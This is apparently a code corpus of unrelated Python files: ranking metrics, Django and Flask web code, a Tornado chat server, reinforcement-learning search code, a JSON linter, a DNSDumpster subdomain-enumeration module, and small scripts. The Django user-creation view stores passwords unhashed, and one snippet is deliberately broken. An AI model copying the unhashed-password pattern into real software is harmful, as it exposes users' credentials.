from collections import defaultdict
import numpy as np
from sklearn import metrics
def ap_score(cands):
"""
Calculates average precision score for all candidates cands.
Parameters
----------
cands: (predicted_scores, actual_labels)
"""
y_true, y_pred = map(list, zip(*cands))
count = 0
score = 0
for i, (y_true, y_pred) in enumerate(cands):
if y_true > 0:
count += 1.0
score += count / (i + 1.0)
return score / (count + 1e-6)
def map_score(qids, labels, preds):
"""
Computes Mean Average Precision (MAP).
Parameters
----------
qids: list
Question ids
labels: list
True relevance labels
pred: list
Predicted ranking scores
Original Code:
https://github.com/aseveryn/deep-qa/blob/master/run_nnet.py#L403
"""
qid_2_cand = defaultdict(list)
for qid, label, pred in zip(qids, labels, preds):
assert pred >= 0 and pred <= 1
qid_2_cand[qid].append((label, pred))
avg_precs = []
for qid, cands in qid_2_cand.items():
avg_prec = ap_score(sorted(cands, reverse=True, key=lambda x: x[1]))
avg_precs.append(avg_prec)
return sum(avg_precs) / len(avg_precs)
def mrr_score_qid(cands):
y_true, y_pred = map(list, zip(*cands))
for i, (y_true, y_pred) in enumerate(cands):
if y_true > 0:
return 1./(i + 1)
return 0
def mrr_score(qids, labels, preds):
"""
Computes Mean Reciprocal Rank (MRR).
Parameters
----------
qids: list
Question ids
labels: list
True relevance labels
pred: list
Predicted ranking scores
"""
qid_2_cand = defaultdict(list)
for qid, label, pred in zip(qids, labels, preds):
assert pred >= 0 and pred <= 1
qid_2_cand[qid].append((label, pred))
mrr_score = 0
for qid, cands in qid_2_cand.items():
mrr_score += mrr_score_qid(sorted(cands, reverse=True, key=lambda x: x[1]))
return mrr_score/len(qid_2_cand)
|
# -*- coding: utf-8 -*-
from django.conf.urls import url
from admina import views
urlpatterns = [
url(r'^index$', views.index),
url(r'^check_news$', views.check_news),
url(r'^add_admin$', views.add_admin),
url(r'^check_admin$', views.check_admin),
url(r'^col_page1$', views.col_page1),
url(r'^col_page2$', views.col_page2),
url(r'^img$', views.img),
url(r'^img_form$', views.img_form),
#返回界面的函数
url(r'^create_admin$', views.create_admin),
url(r'^$', views.login),
url(r'^inspect_admin$', views.inspect_admin),
url(r'^create_column$', views.create_column),
url(r'^inspect_column', views.inspect_column),
url(r'^delete$', views.delete),
url(r'^colum_info$', views.colum_info),
url(r'^add_news_column$', views.add_news_column),
url(r'^inspect_img$', views.inspect_img),
url(r'^save_picture$', views.save_picture),
url(r'^update_admin$', views.update_admin),
url(r'^update_colum$', views.update_colum),
#有特殊意义的函数
]
|
from django.shortcuts import render, HttpResponse
from api.libs.base import CoreView
from account.models import UserProfile
from django.contrib.auth.models import User
from django.contrib.auth.models import Group
from django.db.utils import IntegrityError
# Create your views here.
class Account(CoreView):
"""
用户相关接口
"""
login_required_action = ["get_list", "post_create", "post_change_status", "get_user", "post_change", "post_changepwd"]
superuser_required_action = ["get_list", "post_create", "post_change_status", "get_user", "post_change", "post_changepwd"]
def get_list(self):
"""
获取用户列表接口
:return:
"""
user_list = []
user_objs = UserProfile.objects.all()
for user_obj in user_objs:
user_list.append(user_obj.get_info())
self.response_data['data'] = user_list
def post_create(self):
"""
创建用户接口
:return:
"""
try:
username = self.parameters('username')
password = self.parameters('password')
email = self.parameters('email')
group_ids = self.parameters("group").split(",")
group_objs = Group.objects.filter(id__in=group_ids).all()
is_active = True if self.parameters('status') == 'true' else False
is_superuser = True if self.parameters('is_superuser') == 'true' else False
nickname = self.parameters('nickname')
avatar = self.parameters('avatar')
user_obj = User.objects.create(username=username, password=password, email=email,
is_superuser=is_superuser, is_active=is_active)
for group_obj in group_objs:
user_obj.groups.add(group_obj)
user_obj.save()
user_profile_obj = UserProfile.objects.create(user=user_obj, nickname=nickname, avatar=avatar)
self.response_data['data'] = user_profile_obj.get_info()
except IntegrityError:
self.response_data['status'] = False
self.status_code = 416
# def post_disable(self):
# user_id = self.parameters("user_id")
# user_profile_obj = UserProfile.objects.filter(id=user_id).first()
# if user_profile_obj and user_profile_obj.user:
# user_profile_obj.user.is_active = False
# user_profile_obj.user.save()
# else:
# self.response_data['status'] = False
# self.response_data['data'] = "要编辑的用户不存在"
# self.status_code = 404
# self.response_data['data'] = user_profile_obj.get_info()
#
# def post_enable(self):
# user_id = self.parameters("user_id")
# user_profile_obj = UserProfile.objects.filter(id=user_id).first()
# if user_profile_obj and user_profile_obj.user:
# user_profile_obj.user.is_active = True
# user_profile_obj.user.save()
# else:
# self.response_data['status'] = False
# self.response_data['data'] = "要编辑的用户不存在"
# self.status_code = 404
# self.response_data['data'] = user_profile_obj.get_info()
def post_change_status(self):
user_id = self.parameters("user_id")
is_active = True if self.parameters('status') == 'true' else False
user_profile_obj = UserProfile.objects.filter(id=user_id).first()
if user_profile_obj and user_profile_obj.user:
user_profile_obj.user.is_active = is_active
user_profile_obj.user.save()
else:
self.response_data['status'] = False
self.response_data['data'] = "要编辑的用户不存在"
self.status_code = 404
self.response_data['data'] = user_profile_obj.get_info()
def get_user(self):
user_id = self.parameters("user_id")
user_profile_obj = UserProfile.objects.filter(id=user_id).first()
if user_profile_obj:
self.response_data['data'] = user_profile_obj.get_info()
else:
self.status_code = 404
def post_change(self):
"""
编辑用户接口
:return:
"""
user_id = self.parameters('id')
username = self.parameters('username')
email = self.parameters('email')
is_active = True if self.parameters('status') == 'true' else False
is_superuser = True if self.parameters('is_superuser') == 'true' else False
nickname = self.parameters('nickname')
avatar = self.parameters('avatar')
group_ids = self.parameters("group").split(",")
user_profile_obj = UserProfile.objects.filter(id=user_id).first()
group_objs = Group.objects.filter(id__in=group_ids).all()
if user_profile_obj:
try:
user_profile_obj.user.username = username
user_profile_obj.user.email = email
user_profile_obj.user.is_active = is_active
user_profile_obj.user.is_superuser = is_superuser
user_profile_obj.user.groups = []
for group_obj in group_objs:
user_profile_obj.user.groups.add(group_obj)
user_profile_obj.user.save()
user_profile_obj.avatar = avatar
user_profile_obj.nickname = nickname
user_profile_obj.save()
except IntegrityError:
self.response_data['status'] = False
self.status_code = 416
else:
self.response_data['status'] = False
self.status_code = 404
def post_changepwd(self):
"""
修改密码视图
"""
newpassword = self.parameters("newpassword")
user_id = self.parameters("user_id")
user_profile_obj = UserProfile.objects.filter(id=user_id).first()
if user_profile_obj:
user_profile_obj.user.set_password(newpassword)
user_profile_obj.user.save()
else:
self.response_data['status'] = False
self.status_code = 404
|
#-*- coding:utf-8 -*-
#这是api 1.0版
from flask import Blueprint
api=Blueprint('api',__name__)
from . import authentication,posts,users,comments,errors
|
def half_fib(n):
if n == 1 or n == 2:
return 1
else:
sum = (half_fib(n - 1) + half_fib(n - 2)) % 1000000007
if n % 3 == 0:
return sum - 1
else:
return sum
FIVE_SQUARED = 5 ** 0.5
FI = (1 + FIVE_SQUARED) / 2
PSI = (1 - FIVE_SQUARED) / 2
def half_fib2(n):
fib = (FI ** n - PSI ** n) / FIVE_SQUARED % 2000000014
return (int(round(fib)) + 1) // 2
num_tests = int(raw_input())
for test_index in range(num_tests):
height = int(raw_input())
print(str(half_fib2(height)))
|
from autodisc.systems.statistics.observationdifference import ObservationDifferenceStatistic
|
from abc import ABC, abstractmethod
from pathlib import Path
from typing import Dict, List, Optional, Union
import json
import jsonschema
from flint import LintContext, Lintable
JSON = Dict[str, Union[str, int, List["JSON"], "JSON"]]
JsonPathElement = Union[str, int]
class JsonRule(ABC):
"""
A linting rule that is applied to a JSON object.
This class is not private because it is intended for extension by users.
"""
@abstractmethod
def lint(self, json_obj: JSON, context: LintContext) -> None:
pass
def try_as_int(s: str) -> Union[str, int]:
try:
return int(s)
except ValueError:
return s
class JsonPath:
def __init__(self, elements: List[JsonPathElement]) -> None:
self.elements = list(elements)
@staticmethod
def compile(s: str) -> "JsonPath":
elements = [try_as_int(x) for x in s.split("/") if x]
if not elements:
raise ValueError(f"could not compile '{s}' into JsonPath")
return JsonPath(elements)
def matches(self, context: LintContext, json_object: JSON) -> List[JSON]:
current = [json_object]
try:
for element in self.elements:
# Array index
if isinstance(element, int):
if isinstance(current[0], list):
current = [x[element] for x in current]
else:
return []
# Object property lookup
elif isinstance(element, str):
if isinstance(current[0], dict):
current = [x[element] for x in current]
elif isinstance(current[0], list):
if element == "*":
current = [elem for elems in current for elem in elems]
else:
return []
except KeyError as ex:
context.error(f"could not find key: {ex}")
return current
def __str__(self) -> str:
return "/".join(self.elements)
class _JsonCollectValues(JsonRule):
def __init__(
self, json_path: JsonPath, group: str, key: str, optional: bool = False
) -> None:
self.json_path = json_path
self.group = group
self.key = key
self.optional = optional
def lint(self, json_obj: JSON, context: LintContext) -> None:
found = []
for match in self.json_path.matches(context, json_obj):
found.append(match)
context.extend_property(self.group, self.key, found)
if not self.optional and not found:
context.error(f"JsonPath {self.json_path} did not match any elements")
class _JsonFollowsSchema(JsonRule):
"""
Validates JSON content against a JSON schema.
See: https://json-schema.org/
"""
# Try not to load the same schema more than once
SCHEMA_CACHE: Dict[Path, JSON] = {}
def __init__(self, schema_filename: str) -> None:
self.schema_filename = schema_filename
def lint(self, json_obj: JSON, context: LintContext) -> None:
schema = self.load_schema_file(Path(self.schema_filename), context)
if schema is None:
return
try:
jsonschema.validate(instance=json_obj, schema=schema)
except jsonschema.exceptions.ValidationError as ex:
context.error(f"{ex.message} JSON: {ex.instance}")
@staticmethod
def find_schema_file(path: Path, context: LintContext) -> Optional[Path]:
if path.is_absolute():
return path
search_paths = [Path.cwd()]
for schema_dir in context.args.schema_directories:
if schema_dir.is_absolute():
search_paths.append(Path(schema_dir))
else:
search_paths.append(Path(Path.cwd(), Path(schema_dir)))
for search_path in search_paths:
try_path = Path(search_path, path)
if try_path.is_file():
return try_path
return None
@staticmethod
def load_schema_file(path: Path, context: LintContext) -> Optional[JSON]:
result = _JsonFollowsSchema.SCHEMA_CACHE.get(path, None)
if result is None:
schema_path = _JsonFollowsSchema.find_schema_file(path, context)
if schema_path:
try:
result = json.loads(schema_path.read_text())
_JsonFollowsSchema.SCHEMA_CACHE[path] = result
return result
except json.decoder.JSONDecodeError as ex:
context.error(
f"Malformed JSON found in schema file: {schema_path} - {ex}"
)
return None
except FileNotFoundError as ex:
context.error(
f"Could not find JSON schema file: {schema_path} - {ex}"
)
return None
except jsonschema.exceptions.SchemaError as ex:
context.error(
f"Invalid JSON schema file: {schema_path} - {ex.message}"
)
return None
else:
context.error(
f"Could not find JSON schema file: {path} in {','.join(str(p) for p in context.args.schema_directories)}"
)
return result
class _JsonContent(Lintable):
def __init__(self, children: Optional[List[JsonRule]] = None) -> None:
self.children = list(children) if children else []
def lint(self, context: LintContext) -> None:
if not context.path.is_file():
context.error(f"Can only check JSON content for files: {context.path}")
json_text = context.path.read_text()
try:
json_object = json.loads(json_text)
except json.decoder.JSONDecodeError as ex:
context.error(str(ex))
else:
for child in self.children:
child.lint(json_object, context)
def json_content(*args, **kwargs) -> Lintable:
return _JsonContent(*args, **kwargs)
def follows_schema(schema_file_name: str) -> JsonRule:
return _JsonFollowsSchema(schema_file_name)
def collect_values(*args, **kwargs):
return _JsonCollectValues(*args, **kwargs)
|
import time
import random
import numpy as np
import pandas as pd
import math
import sys
import os.path
import matplotlib
import matplotlib.pyplot as plt
TTABLE_IDX_ACTIONS_COUNT = 1
TTABLE_IDX_TABLE = 0
class TreeData:
def __init__(self):
# solver params
self.LEARNING_RATE = 0.01
self.DISCOUNT = 0.95
self.EXPLORE_STOP = 0.01
self.EXPLORE_START = 1.0
self.EXPLORE_RATE = 0.0001
self.SIZE_TRANSITION_TO_COMPLETE_TABLE = 5
# tables
self.MIN_TRANSITIONS_TO_CONTINUE_SIM = 1
self.T_TABLE = None
self.Q_TABLE = None
self.STATE_DICT = None
self.VALUES_2_UPDATE_DICT = None
self.MAX_SIMULATE_DEPTH = 25
self.MAX_ROLLOUT_DEPTH = 300
# model params
self.NUM_ACTIONS = None
self.TERMINAL_STATES = ['win', 'loss', 'tie', 'terminal']
self.REWARDS = {}
self.REWARDS['win'] = 1
self.REWARDS['loss'] = -1
self.REWARDS['tie'] = -1
self.REWARDS['terminal'] = 0
self.MIN_REWARD = min(self.REWARDS.values())
def ExplorationFactor(self, count):
return self.EXPLORE_STOP + (self.EXPLORE_START - self.EXPLORE_STOP) * np.exp(-self.EXPLORE_RATE * count)
def ChooseRandomState(self, minTransitionsCount = 5):
numVals = 0
while numVals < minTransitionsCount:
state = random.choice(list(self.T_TABLE.table.keys()))
if type(self.T_TABLE.table[state])==list and len(self.T_TABLE.table[state]) > 1:
numVals = sum(self.T_TABLE.table[state][1])
stateOnlyTable = ''.join(state)
return stateOnlyTable
def UpdateQTable(self, qTableName):
self.Q_TABLE = pd.read_pickle(qTableName + '.gz', compression='gzip')
count = 0
for s, toUpdate in self.VALUES_2_UPDATE_DICT.items():
count += len(toUpdate)
for a, val in toUpdate.items():
self.Q_TABLE.ix[s,a] += self.LEARNING_RATE * (val - self.Q_TABLE.ix[s,a] )
self.Q_TABLE.to_pickle(qTableName + '.gz', 'gzip')
return count
TREE_DATA = TreeData()
def LenStat(tTableName, numiterations = 100, maxNumRec = 100, runOnAllOptions = False):
ttable = pd.read_pickle(tTableName + '.gz', compression='gzip')
terminalStates = ['loss' ,'win','tie']
allStates = list(ttable.keys())
allLength = []
allDeadEnds = 0
allLiveEnds = 0
i = 0
while i < numiterations:
s = random.choice(allStates)
if s != "TrialsData":
print("\n\n\nstate:",s,"\n", ttable[s])
i += 1
l, deadEnds, liveEnds = LenToTerminal(ttable, s, terminalStates, runOnAllOptions, maxNumRec)
allLength = l + allLength
allDeadEnds = deadEnds + allDeadEnds
allLiveEnds = allLiveEnds + liveEnds
print("deadEnds = ", allDeadEnds, "liveEnds = ", allLiveEnds)
plt.hist(allLength)
plt.show()
return allLength, allDeadEnds, allLiveEnds
def LenToTerminal(ttable, s, terminalStates, runOnAllOptions = False, maxRecDepth = 50, currIdx = 0):
if s in terminalStates:
return [currIdx], 0, 1
elif currIdx == maxRecDepth:
return [currIdx], 1, 0
else:
#stateHist.append(s)
table = ttable[s][0]
allStates = list(table.index)
allLength = []
allLiveEnds = 0
if len(allStates) == 0:
allDeadEnds = 1
else:
allDeadEnds = 0
if runOnAllOptions:
for s_ in allStates:
if s_ != s:
l, deadEnds, liveEnds = LenToTerminal(ttable, s_, terminalStates, runOnAllOptions, maxRecDepth, currIdx + 1)
allLength = allLength + l
allDeadEnds = deadEnds + allDeadEnds
allLiveEnds = liveEnds + allLiveEnds
else:
choose = False
while not choose:
s_ = random.choice(allStates)
if s_ != s:
choose = True
allLength, allDeadEnds, allLiveEnds = LenToTerminal(ttable, s_, terminalStates, runOnAllOptions, maxRecDepth, currIdx + 1)
return allLength, allDeadEnds, allLiveEnds
# LenStat("melee_attack_ttable_onlineHallucination", 20,50, True)
def HallucinationMngrPSFunc(sharedDict):
TREE_DATA.NUM_ACTIONS = sharedDict["num_actions"]
TREE_DATA.STATE_DICT = {}
TREE_DATA.VALUES_2_UPDATE_DICT = {}
qTableName = sharedDict["q_table"]
tTableName = sharedDict["t_table"]
hMngr = HallucinationMngr()
TTableCreated = False
if os.path.isfile(tTableName + '.gz') and not TTableCreated:
TREE_DATA.T_TABLE = pd.read_pickle(tTableName + '.gz', compression='gzip')
TTableCreated = True
while True:
while TTableCreated:
if hMngr.UpdateRoot(sharedDict):
hMngr.Hallucinate(sharedDict)
hMngr.InsertValues2Dict()
if sharedDict["updateTableFlag"]:
break
updateTableFlag = False
while not updateTableFlag:
updateTableFlag = sharedDict["updateTableFlag"]
count = TREE_DATA.UpdateQTable(qTableName)
TREE_DATA.T_TABLE = pd.read_pickle(tTableName + '.gz', compression='gzip')
TTableCreated = True
sharedDict["updateTableFlag"] = False
print("\n\n\tupdate q table count vals =", count)
TREE_DATA.VALUES_2_UPDATE_DICT = {}
TREE_DATA.STATE_DICT = {}
class HallucinationMngr:
def __init__(self):
self.currRoot = None
def UpdateTables(self, qTable, tTable):
TREE_DATA.Q_TABLE = qTable.table.copy()
TREE_DATA.T_TABLE = tTable.table.copy()
TREE_DATA.STATE_DICT = {}
self.updateTable = True
def Hallucinate(self, sharedDict):
contHallucinate = True
while contHallucinate:
self.currRoot.Simulate(self.currRoot)
if sharedDict["updateStateFlag"] == True:
contHallucinate = False
def UpdateRoot(self, sharedDict):
if sharedDict["updateStateFlag"] == True:
nextState = sharedDict["nextState"]
sharedDict["updateStateFlag"] = False
if nextState in TREE_DATA.T_TABLE:
if nextState not in TREE_DATA.STATE_DICT:
TREE_DATA.STATE_DICT[nextState] = StateNode(nextState)
self.currRoot = TREE_DATA.STATE_DICT[nextState]
return True
return False
def ChooseAction(self):
if self.currRoot == None:
return None
return self.currRoot.ChooseAction()
def Value(self,action):
if self.currRoot == None:
return None
return self.currRoot.Value(action)
def ExecuteAction(self, state, action):
if state in TREE_DATA.T_TABLE:
return self.currRoot.FindNextState(state, action)
else:
return "terminal"
def InsertValues2Dict(self):
if self.currRoot != None:
self.currRoot.InsertValues2Dict()
def Depth(self):
if self.currRoot != None:
return self.currRoot.Depth() + 1
else:
return 0
def Size(self):
if self.currRoot != None:
return self.currRoot.Size()
else:
return 0
def Count(self):
if self.currRoot != None:
return self.currRoot.count
else:
return 0
class StateNode:
def __init__(self, state, count = 0):
self.state = state
self.count = count
self.actionChilds = []
self.CreateActionChilds()
# self.terminationCount = {}
# self.terminationCount["loss"] = 0
# self.terminationCount["win"] = 0
# self.terminationCount["tie"] = 0
# self.terminationCount["terminal"] = 0
# self.terminationCount["recDepth"] = 0
def Simulate(self, root, currIdx = 0):
action = self.UpperBoundAction()
nextState = self.FindNextState(self.state, action)
if nextState in TREE_DATA.TERMINAL_STATES:
maxIdx = currIdx
reward = TREE_DATA.REWARDS[nextState]
elif nextState not in self.actionChilds[action].stateChilds or currIdx >= TREE_DATA.MAX_SIMULATE_DEPTH:
maxIdx = currIdx
rollOutHist = [nextState]
reward = TREE_DATA.DISCOUNT * self.Rollout(nextState, root, rollOutHist, currIdx + 1)
self.actionChilds[action].AddState(nextState)
else:
r, maxIdx = self.actionChilds[action].stateChilds[nextState].Simulate(root, currIdx + 1)
reward = TREE_DATA.DISCOUNT * r
self.UpdateReward(action, reward)
return reward, maxIdx
def Rollout(self, state, root, rolloutHist, currIdx):
if currIdx >= TREE_DATA.MAX_ROLLOUT_DEPTH:
return 0
rolloutHist.append(state)
nextState = "terminal"
if state in TREE_DATA.T_TABLE:
if TREE_DATA.T_TABLE[state][TTABLE_IDX_ACTIONS_COUNT] != None:
actionCount = TREE_DATA.T_TABLE[state][TTABLE_IDX_ACTIONS_COUNT]
existingAction = [i for i in range(len(actionCount)) if actionCount[i] > 0]
action = random.choice(existingAction)
nextState = self.FindNextState(state, action, rolloutHist)
if nextState in TREE_DATA.TERMINAL_STATES:
return TREE_DATA.REWARDS[nextState]
else:
return TREE_DATA.DISCOUNT * self.Rollout(nextState, root, rolloutHist, currIdx + 1)
def CreateActionChilds(self):
valueVector = np.zeros(TREE_DATA.NUM_ACTIONS, dtype=np.float, order='C')
for a in range(0, TREE_DATA.NUM_ACTIONS):
self.actionChilds.append(ActionNode(self.state, a, valueVector[a]))
def UpperBoundAction(self):
bestValue = TREE_DATA.MIN_REWARD - 1
bestAction = -1
actionCount = TREE_DATA.T_TABLE[self.state][TTABLE_IDX_ACTIONS_COUNT]
existingActions = [i for i in range(len(actionCount)) if actionCount[i] > 0]
for a in existingActions:
if self.actionChilds[a].count == 0:
return a
val = self.actionChilds[a].value + TREE_DATA.ExplorationFactor(self.count) * math.sqrt(math.log(self.count + 1) / self.actionChilds[a].count)
if val > bestValue:
bestValue = val
bestAction = a
return bestAction
def ChooseAction(self):
if len(self.actionChilds) == 0:
return None
idxMax = -1
rewardMax = TREE_DATA.MIN_REWARD - 1
for a in range (0, TREE_DATA.NUM_ACTIONS):
if self.actionChilds[a].value > rewardMax:
idxMax = a
rewardMax = self.actionChilds[a].value
return idxMax
def Value(self, action):
if len(self.actionChilds) == 0:
return None
return self.actionChilds[action].value
def InsertValues2Dict(self):
if self.state not in TREE_DATA.VALUES_2_UPDATE_DICT:
TREE_DATA.VALUES_2_UPDATE_DICT[self.state] = {}
for a in range(0, TREE_DATA.NUM_ACTIONS):
child = self.actionChilds[a]
if child.count > 0:
TREE_DATA.VALUES_2_UPDATE_DICT[self.state][a] = child.value
def FindNextState(self, state, action, avoidStates = []):
stateSize = TREE_DATA.T_TABLE[state][TTABLE_IDX_ACTIONS_COUNT][action]
stateNum = random.randint(0, stateSize)
prevDifferentState = "terminal"
for s_ in TREE_DATA.T_TABLE[state][TTABLE_IDX_TABLE].index:
stateNum -= TREE_DATA.T_TABLE[state][TTABLE_IDX_TABLE].ix[s_, action]
if s_ != state and s_ not in avoidStates:
prevDifferentState = s_
if stateNum <= 0 and prevDifferentState != "terminal":
break
return prevDifferentState
def UpdateReward(self, action, reward):
if reward != 0:
self.actionChilds[action].UpdateReward(reward)
self.count += 1
def Depth(self):
d = 0
for a in self.actionChilds:
d = max(d, a.Depth())
return d + 1
def Size(self):
size = 0
for a in self.actionChilds:
size += a.Size()
return size + 1
class ActionNode:
def __init__(self, state, action, value = 0):
self.fatherState = state
self.action = action
self.stateChilds = {}
self.value = value
self.count = 0
def AddState(self, state, count = 0):
if state not in TREE_DATA.STATE_DICT:
TREE_DATA.STATE_DICT[state] = StateNode(state, count)
if state != self.fatherState:
self.stateChilds[state] = TREE_DATA.STATE_DICT[state]
def UpdateReward(self, reward):
if reward != 0:
self.value = (self.value * self.count + reward) / (self.count + 1)
self.count += 1
def Depth(self):
d = 0
for state in self.stateChilds.values():
d = max(d, state.Depth())
return d
def Size(self):
size = len(self.stateChilds)
for state in self.stateChilds.values():
size += state.Size()
return size
|
M, D = input().split()
print("yup" if (M == "OCT" and D == "31") or (M == "DEC" and D == "25") else "nope")
if M == "sdfoijsdfoij":
print("LOL this isn't correct")
k = {}
k["sdf"] = 5
print(K["sd"])
|
import datetime
import json
import os
import uuid
import tornado.escape
import tornado.ioloop
import tornado.web
import tornado.websocket
class ChatWebSocket(tornado.websocket.WebSocketHandler):
clients = []
def open(self):
print("websocket opened")
self.ID = str(uuid.uuid4())
self.nickname = self.ID
if self not in self.clients:
self.clients.append(self)
to_send = {
"event": "server-message",
"data": {
"type": "user-join",
"timestamp": str(datetime.datetime.utcnow()),
"user": {
"id": self.ID,
"nickname": self.nickname
}
}
}
self.broadcast(json.dumps(to_send))
def on_message(self, message):
print("recieved message from {}: {}".format(self.ID, message))
parsed = json.loads(message)
if parsed["event"] == "nickname-update":
old_nickname = self.nickname
self.nickname = tornado.escape.xhtml_escape(parsed["data"]["nickname"])
to_send = {
"event": "server-message",
"data": {
"type": "nickname-update",
"timestamp": str(datetime.datetime.utcnow()),
"user": {
"id": self.ID,
"old-nickname": old_nickname,
"new-nickname": self.nickname
}
}
}
self.broadcast(json.dumps(to_send))
elif parsed["event"] == "message":
to_send = {
"event": "user-message",
"data": {
"id": str(uuid.uuid4()),
"timestamp": str(datetime.datetime.utcnow()),
"body": tornado.escape.xhtml_escape(parsed["data"]["body"]),
"from": {
"id": self.ID,
"nickname": self.nickname
}
}
}
self.broadcast(json.dumps(to_send))
def on_close(self):
print("websocket closed")
self.clients.remove(self)
to_send = {
"event": "server-message",
"data": {
"type": "user-leave",
"timestamp": str(datetime.datetime.utcnow()),
"user": {
"id": self.ID,
"nickname": self.nickname
}
}
}
self.broadcast(json.dumps(to_send))
def broadcast(self, message):
for client in self.clients:
client.write_message(message)
class IndexHandler(tornado.web.RequestHandler):
def get(self):
self.render("index.html", title="chat test")
class App(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", IndexHandler),
(r"/websocket", ChatWebSocket)
]
settings = dict(
template_path = os.path.join(os.path.dirname(__file__), "template"),
static_path = os.path.join(os.path.dirname(__file__), "static")
)
tornado.web.Application.__init__(self, handlers, **settings)
if __name__ == "__main__":
app = App()
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
|
# Generated by Django 2.2.13 on 2020-07-10 05:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0031_auto_20200710_1127'),
]
operations = [
migrations.AlterField(
model_name='contactmessage',
name='title',
field=models.CharField(blank=True, max_length=255),
),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module plots hloc data.
"""
import os
import argparse
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.finance import candlestick2_ohlc, volume_overlay
import logger
class PlotChart(object):
"""
This class plot the hloc btc data.
"""
def __init__(self, root_logger, input_file):
# type: (logger, str) -> None
"""
Class initialization
"""
self.logger = root_logger
self.input_file = input_file
def run(self):
# type: () -> None
"""
Read and plot the hloc file specified by the argument.
:return:
"""
# ファイル存在チェック
if not os.path.exists(self.input_file):
self.logger.logger.error('Does not exist input file: {}'.format(self.input_file))
exit(1)
# hlocデータをロード
df_btc = self.load_btc_data()
# 参考 http://www.madopro.net/entry/bitcoin_chart
# ローソク足をプロット
fig = plt.figure(figsize=(18, 9))
ax = plt.subplot(1, 1, 1)
candlestick2_ohlc(ax, df_btc["first"], df_btc["max"], df_btc["min"], df_btc["last"], width=0.9, colorup="b", colordown="r")
# 横軸のセット
ax.set_xticklabels([(df_btc.index[int(x)] if x < df_btc.shape[0] else x) for x in ax.get_xticks()], rotation=90)
ax.set_xlim([0, df_btc.shape[0]])
ax.set_ylabel("Price")
ax.grid()
# ローソク足のサイズ調整
bottom, top = ax.get_ylim()
ax.set_ylim(bottom - (top - bottom) / 4, top)
# 出来高を上からプロット
ax2 = ax.twinx()
volume_overlay(ax2, df_btc["first"], df_btc["last"], df_btc["size"], width=1, colorup="g", colordown="g")
ax2.set_xlim([0, df_btc.shape[0]])
# 出来高のサイズ調整
ax2.set_ylim([0, df_btc["size"].max() * 4])
ax2.set_ylabel("Volume")
plt.show()
def load_btc_data(self):
# type: () -> df
"""
Load hloc btc data.
:return: hloc btc data frame
"""
df_btc = pd.read_csv(self.input_file, index_col='datetime')
self.logger.logger.info('Load btc file: {}'.format(self.input_file))
return df_btc
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', help='file name(including directory path).',
action='store',
required=True)
args = parser.parse_args()
logger = logger.Logger()
logger.logger.info('START plotchart')
plot_chart = PlotChart(logger, args.file)
plot_chart.run()
|
import time
from dnsdumpster.DNSDumpsterAPI import DNSDumpsterAPI
from simplydomain.src import core_serialization
from simplydomain.src import module_helpers
from simplydomain.src import core_scrub
# use RequestsHelpers() class to make requests to target URL
class DynamicModule(module_helpers.RequestsHelpers):
"""
Dynamic module class that will be loaded and called
at runtime. This will allow modules to easily be independent of the
core runtime.
"""
def __init__(self, json_entry):
"""
Init class structure. Each module takes a JSON entry object which
can pass different values to the module with out changing up the API.
adapted form Empire Project:
https://github.com/EmpireProject/Empire/blob/master/lib/modules/python_template.py
:param json_entry: JSON data object passed to the module.
"""
module_helpers.RequestsHelpers.__init__(self)
self.json_entry = json_entry
self.info = {
# mod name
'Module': 'dnsdumpster_search.py',
# long name of the module to be used
'Name': 'Python API for Dnsdumpster',
# version of the module to be used
'Version': '1.0',
# description
'Description': ['(Unofficial) Python API for',
'https://dnsdumpster.com/ using @paulsec lib.'],
# authors or sources to be quoted
'Authors': ['@Killswitch-GUI', '@PaulSec'],
# list of resources or comments
'comments': [
'Searches for prior seen domains, as well as data that goes with those.'
]
}
self.options = {
'threads': '',
'url': 'https://dnsdumpster.com',
}
def dynamic_main(self, queue_dict):
"""
Main entry point for process to call.
core_serialization.SubDomain Attributes:
name: long name of method
module_name: name of the module that performed collection
source: source of the subdomain or resource of collection
module_version: version from meta
source: source of the collection
time: time the result obj was built
subdomain: subdomain to use
valid: is domain valid
:return: NONE
"""
core_args = self.json_entry['args']
task_output_queue = queue_dict['task_output_queue']
cs = core_scrub.Scrub()
data = DNSDumpsterAPI().search(str(core_args.DOMAIN))
for d in data['dns_records']['host']:
cs.subdomain = d['domain']
# check if domain name is valid
valid = cs.validate_domain()
# build the SubDomain Object to pass
sub_obj = core_serialization.SubDomain(
self.info["Name"],
self.info["Module"],
self.options['url'],
self.info["Version"],
time.time(),
d['domain'],
valid
)
# populate queue with return data object
task_output_queue.put(sub_obj)
|
import msvcrt
import playsound
while True:
if msvcrt.kbhit():
key = msvcrt.getch()
#print(key) # just to show the result
if (key == b'\r' or key == b'\n' or key == b'\r\n' or key == b'\n\r'):
playsound.playsound('./sound.mp3', True)
print(key)
|
# -*- coding: utf-8 -*-
import os
import requests
from tqdm import tqdm
def download(src, url):
file_size = int(requests.head(url).headers['Content-Length'])
header = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
'70.0.3538.67 Safari/537.36'
}
pbar = tqdm(total=file_size)
resp = requests.get(url, headers=header, stream=True)
with open(src, 'ab') as f:
for chunk in resp.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
pbar.update(1024)
pbar.close()
return file_size
abs_path = os.path.abspath(__file__)
data_dir = os.path.join(os.path.dirname(abs_path), "data")
if not os.path.exists(data_dir) or not os.path.isdir(data_dir):
os.makedirs(data_dir)
download_url = "http://qim.fs.quoracdn.net/quora_duplicate_questions.tsv"
downlaod_path = os.path.join(data_dir, "quora_duplicate_questions.tsv")
download(downlaod_path, download_url)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.